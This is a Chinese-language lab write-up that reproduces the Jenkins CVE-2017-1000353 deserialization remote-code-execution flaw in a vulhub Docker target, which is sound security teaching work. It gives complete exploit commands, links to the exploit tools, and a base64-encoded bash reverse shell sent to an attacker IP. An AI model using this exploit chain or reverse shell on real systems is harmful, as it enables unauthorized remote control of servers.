实验目的
1、能成功搭建漏洞测试与测试工具所需的运行环境
2、能成功利用漏洞原理测试复现漏洞
实验环境
1、VMware Workstation 16
2、kali
3、vulhub靶场
使用场景
Jenkins 可以自动执行代码构建、编译、打包以及单元测试、集成测试等,确保代码质量,还拥有丰富的插件库,能够集成各种工具和服务,且支持自动化部署应用到测试或生产环境。
业务能力
Jenkins 提供详细的构建日志和报告,通过自动化构建和测试,能够为开发团队提供了高效的持续集成和持续部署解决方案,同时促进敏捷开发和 DevOps 实践的落地。
实验步骤
漏洞环境使用vulhub搭建,漏洞目录为 vulhub/jenkins/CVE-2017-1000353
执行如下命令启动jenkins 2.46.1:docker-compose up -d
查看靶场端口:docker ps
完全启动成功后,访问http://your-ip:8080即可看到jenkins已成功运行
创建文件 docker环境测试
依赖工具下载连接:
exploit.py :CVE-2017-1000353/exploit.py at master · vulhub/CVE-2017-1000353 · GitHub
CVE-2017-1000353-SNAPSHOT-all.jar:
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
生成序列化字符串 jenkins_poc.ser
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
如果在这步中出现如下warning,则说明java版本过高,可以自行安装并切换为jdk1.8版本
将刚才生成的字节码文件发送给目标:python exploit.py http://your-ip:8080 jenkins_poc.ser
进入容器,命令:docker-compose exec jenkins bash
可以看到/tmp/success成功被创建,说明命令执行漏洞利用成功
反弹shell在线靶场测试
#bash反弹命令
bash -i >& /dev/tcp/kali-ip /4444 0>&1
将命令进行base64编码得到base64编码值:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1MC4xNDQvNDQ0NCAwPiYx
打开监听:
生成序列化字符串,即jenkins_poc.ser文件:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1MC4xNDQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"
使用 exploit.py 发送 jenkins_poc.ser 至 Jenkins:
python3 exploit.py http://192.168.150.144:8080 jenkins_poc.ser
查看监听端口可以看到反弹成功
复现完记得关闭容器:docker-compose down